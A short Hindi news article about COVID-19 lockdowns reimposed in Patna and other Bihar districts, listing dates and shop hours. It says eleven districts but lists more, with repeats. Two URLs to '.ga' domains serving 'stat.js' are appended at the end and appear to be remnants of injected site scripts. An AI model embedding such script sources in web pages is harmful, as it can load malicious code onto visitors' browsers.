बिहार में कोरोना वायरस का प्रकोप तेजी से बढ़ता जा रहा है, प्रतिदिन काफी संख्या में कोरोना के नए मरीज मिल रहे हैं। इसे देखते हुए कोरोना से बचाव के मद्देनजर कई जिलों में वहां के प्रशासन ने कड़े कदम उठाए हैं। इसके तहत बिहार के 11 जिलों में फिर से लॉकडाउन लगा दिया गया है। इनमें राजधानी पटना के साथ ही कैमूर, बक्सर, नवादा, सुपौल, मधेपुरा, खगड़िया, मुंगेर, किशनगंज, मुजफ्फरपुर,पश्चिमी चंपारण, पूर्वी चंपारण, मधुबनी, नालंदा, भागलपुर, बेगूसराय, मधेपुरा शामिल हैं।

वहीं, कई जिलों में प्रशासन ने शनिवार से लॉकडाउन लागू किया है। इनमें वैशाली और नालंदा जिले हैं। जिलों ने अपने यहां अलग-अलग अवधि तक के लिए लॉकडाउन लगाया है। उधर, पूर्णिया नगर निगम क्षेत्र में शुक्रवार और भोजपुर जिला मुख्यालय आरा शहर के मुख्य बाजार वाले इलाकों में 11 से लॉकडाउन रहेगा।

पटना में आज सुबह से ही लॉकडाउन का असर दिख रहा है, सड़कों पर ट्रैफिक कम है औऱ दुकानें भी कम ही खुली हैं। राजधानी की सड़कों पर कई जगह सुबह से सन्नाटा पसरा रहा तो वहीं पैदल भी कम लोग ही बाहर निकले हैं। जिले में दुकानों को दो पालियों में खोलने का निर्णय लिया गया है। पटना में 10 बजे तक किराना दुकान और दवा की दुकानें खुलेंगी जबकि फल, अंडे, मीट, मछली की दुकानें शाम में 4 बजे से 7 बजे तक खुलेंगी।

बिहार के इन जिलों में लॉकडाउन की अवधि

बेगूसराय 11 से 16 जुलाई तक, नालंदा 11 से 15 जुलाई तक, मुंगेर 10 से 16 जुलाई तक, मधेपुरा 10 से 16 जुलाई तक, खगड़िया 10 से 14 जुलाई तक, मुजफ्फरपुर हफ्ते में दो दिन बंदी, पटना में 10 जुलाई से 16 जुलाई तक लॉकडाउन, बक्सर में 10 जुलाई से 12 जुलाई तक लॉकडाउन, नवादा में 10 जुलाई से 12 जुलाई तक लॉकडाउन, पश्चिमी चंपारण में 9 जुलाई से अगले आदेश तक लॉकडाउन, पूर्वी चंपारण में 8 जुलाई से 14 जुलाई तक लॉकडाउन, खगड़िया में 10 जुलाई से 14 जुलाई तक लॉकडाउन, पूर्णिया में 10 जुलाई से 16 जुलाई तक लॉकडाउन, किशनगंज में 7 जुलाई से 10 जुलाई तक लॉकडाउन, भागलपुर में 9 जुलाई से 15 जुलाई तक लॉकडाउन, मधुबनी में हुआ था तीन दिनों का लॉकडाउन, सुपौल में 10 जुलाई से 12 जुलाई तक लॉकडाउन।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published. Required fields are marked *